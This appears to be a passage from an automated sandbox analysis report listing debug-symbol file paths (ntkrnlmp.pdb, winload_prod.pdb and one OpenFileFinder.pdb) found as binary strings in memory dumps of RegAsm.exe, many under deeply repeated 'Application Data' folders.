        Source: Binary string: $^qHC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q\C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\Naveen\mysvn\OpenFileFinder_src_vc8\OpenFileFinder\bin\win32\release\OpenFileFinder.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qYC:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q]C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q{C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q|C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qKC:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
